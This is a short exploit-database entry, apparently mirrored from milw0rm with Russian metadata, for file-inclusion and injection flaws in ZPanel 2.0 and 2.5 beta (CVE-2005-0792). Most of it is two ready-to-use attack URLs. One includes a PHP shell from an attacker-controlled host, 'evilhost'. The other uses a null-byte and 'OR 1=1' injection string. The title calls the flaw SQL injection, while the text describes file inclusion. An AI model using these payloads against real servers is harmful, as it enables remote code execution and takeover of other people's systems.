Exploit ZPanel 2.5 - SQL Injection

[Exploiter]

EDB-ID

881

Проверка EDB

1. Пройдено

Автор

MIKHAIL

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2005-0792

Дата публикации

2005-03-15

# Tested and working /str0ke

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1


# milw0rm.com [2005-03-15]